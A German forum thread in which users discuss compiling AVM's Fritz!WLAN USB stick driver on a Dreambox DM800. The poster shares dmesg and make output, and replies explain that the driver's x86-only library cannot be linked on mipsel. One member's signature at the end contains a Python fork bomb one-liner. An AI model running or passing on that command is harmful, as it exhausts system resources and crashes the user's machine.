Fritz!WLAN-USB-Stick: Treiber übersetzen?

• der Chipsatz ist mir unbekannt, habe aber in etlichen Foren gelesen, dass die AVM-Sticks (auch die N-Draft) nicht unterstützt werden.

dmesg | grep usb:

Quellcode

1. usb 1-2: USB disconnect, address 3
      2. usb 1-2: usb_disable_device nuking all URBs
      3. usb 1-2: unregistering interface 1-2:1.0
      4. usb 1-2:1.0: hotplug
      5. usb 1-2: unregistering device
      6. usb 1-2: hotplug
      7. usb 1-2: new high speed USB device using brcm-ehci and address 4
      8. usb 1-2: default language 0x0409
      9. usb 1-2: new device strings: Mfr=3, Product=2, SerialNumber=1
      10. usb 1-2: Product: WLAN USB Device
      11. usb 1-2: Manufacturer: AVM GmbH
      12. usb 1-2: SerialNumber: XXXXXXXXXXXX
      13. usb 1-2: hotplug
      14. usb 1-2: adding 1-2:1.0 (config #1, interface 0)
      15. usb 1-2:1.0: hotplug
      Alles anzeigen
    • ich wollte es mal selbst versuchen, aber das Problem liegt anscheinend an den Linux-Headers... dream-multimedia-tv.de/board/i…ad&postID=13928#post13928

Ein "make" liefert:

Quellcode

1. root@dm800:/tmp/fritz/src# make
      2. make -C /lib/modules/2.6.12-5.1-brcmstb-dm800/build SUBDIRS=/tmp/fritz/src modules
      3. make[1]: Entering directory `/lib/modules/2.6.12-5.1-brcmstb-dm800/build'
      4. make[1]: *** No rule to make target `modules'. Stop.
      5. make[1]: Leaving directory `/lib/modules/2.6.12-5.1-brcmstb-dm800/build'
      6. make: *** [fwlanusb.o] Error 2
    • RE: Fritz!WLAN-USB-Stick: Treiber übersetzen?

Original von MailMan
      Guude @all,

ich wollte heute mal WLAN mit der DM800 und o.g. Stick testen, der ja leider nicht erkannt wird.
      AVM bietet entsprechende Linux-Treiber, hat mal jemand versucht diese zu übersetzen?

in den treibern ist eine lib für x86 und deine box bräuchte diesen für mipsel
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

Original von nixkoenner
      Original von MailMan
      Guude @all,

ich wollte heute mal WLAN mit der DM800 und o.g. Stick testen, der ja leider nicht erkannt wird.
      AVM bietet entsprechende Linux-Treiber, hat mal jemand versucht diese zu übersetzen?

in den treibern ist eine lib für x86 und deine box bräuchte diesen für mipsel

die Übersetzung macht auch bei "mipsel" keine Sorgen, aber wie übersetzen?! Das ist die Frage...

Original von MailMan
      die Übersetzung macht auch bei "mipsel" keine Sorgen, aber wie übersetzen?! Das ist die Frage...

gar nicht da die x86 lib zum linken gebraucht wird und du nun mal eine mipsel arcetektur hast
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von nixkoenner ()

Original von nixkoenner
      Original von MailMan

gar nicht da die x86 lib zum linken gebraucht wird und du nun mal eine mipsel arcetektur hast

aber ich kompiliere ja auf der DM, zumindest versuche ich es.
    • Im treiber gibts ne lib bzw eine .so die verwaltet die funktionen für den stick .Diese ist für die x86 plattform gebaut worden (PC Kompatibel).Eine mipsel variante liegt nicht dabei und ein linken plattform übergreifend geht nicht da der mipsel eine völlig andere plattform ist..
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !